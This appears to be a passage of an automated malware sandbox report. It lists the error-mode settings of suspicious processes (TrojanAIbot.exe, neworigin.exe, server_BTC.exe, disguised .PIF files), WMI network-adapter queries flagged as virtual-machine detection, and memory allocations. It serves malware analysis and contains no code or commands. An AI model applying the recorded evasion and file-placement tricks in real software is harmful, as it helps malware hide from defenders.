Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 26B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 1210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 4D70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2770000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2510000 memory reserve \| memory write watch
